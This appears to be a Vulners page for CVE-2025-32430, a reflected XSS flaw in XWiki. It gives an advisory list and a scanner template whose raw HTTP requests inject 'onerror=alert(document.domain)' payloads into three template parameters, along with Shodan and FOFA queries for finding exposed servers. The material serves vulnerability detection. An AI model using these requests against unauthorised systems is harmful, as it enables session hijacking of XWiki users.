| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| The vulnerability of the XWiki platform for creating collaborative web applications lies in its lack of protection for website structures. This allows attackers to execute arbitrary JavaScript code. | 18 Jun 202500:00 | – | bdu_fstec | |
| CVE-2025-32430 | 5 Aug 202514:58 | – | circl | |
| XWiki Platform 安全漏洞 | 6 Aug 202500:00 | – | cnnvd | |
| CVE-2025-32430 | 5 Aug 202523:27 | – | cve | |
| CVE-2025-32430 XWiki Platform contains Reflected XSS vulnerability in two templates | 5 Aug 202523:27 | – | cvelist | |
| EUVD-2025-23657 | 3 Oct 202520:07 | – | euvd | |
| XWiki allows Reflected XSS in two templates | 5 Aug 202515:32 | – | github | |
| CVE-2025-32430 | 6 Aug 202500:15 | – | nvd | |
| CVE-2025-32430 XWiki Platform contains Reflected XSS vulnerability in two templates | 5 Aug 202523:27 | – | osv | |
| GHSA-M9X4-W7P9-MXHX XWiki allows Reflected XSS in two templates | 5 Aug 202515:32 | – | osv |
id: CVE-2025-32430
info:
name: XWiki Platform - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
XWiki Platform versions >= 4.2-milestone-3 and < 16.4.8, >= 16.5.0-rc-1 and < 16.10.6, and >= 17.0.0-rc-1 and < 17.3.0-rc-1 are vulnerable to reflected XSS in two templates. The vulnerability allows an attacker to execute malicious JavaScript code in the context of the victim's session by getting the victim to visit an attacker-controlled URL.
impact: |
Attackers can execute malicious JavaScript in victim sessions by crafting URLs with XSS payloads in translationPrefix, extensionId, or extensionVersionConstraint parameters.
remediation: |
Upgrade to XWiki Platform version 16.4.8, 16.10.6, or 17.3.0-rc-1 or later that properly sanitizes user input in templates.
reference:
- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-m9x4-w7p9-mxhx
- https://jira.xwiki.org/browse/XWIKI-23096
- https://nvd.nist.gov/vuln/detail/CVE-2025-32430
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
cvss-score: 6.5
cve-id: CVE-2025-32430
epss-score: 0.00634
epss-percentile: 0.45989
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
vendor: xwiki
product: xwiki-platform
shodan-query: http.html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: cve,cve2025,xwiki,xss,vuln
http:
- raw:
- |
GET /xwiki/bin/view/Main/?xpage=job_status_json&jobId=asdf&translationPrefix=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
- |
GET /xwiki/bin/view/Main/?xpage=distribution&extensionId=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&extensionVersionConstraint=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=1 onerror=alert(document.domain)>.notFound'
- type: word
part: content_type
words:
- 'text/html'
- type: status
status:
- 404
# digest: 4b0a00483046022100869284d0538210b07339d7ab48625288c41ffc925024544fb2dd568683afa17d022100c3a4f6638c1ca94492922ff019cb6059757d925133c39be53607df8dfb33bd96:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation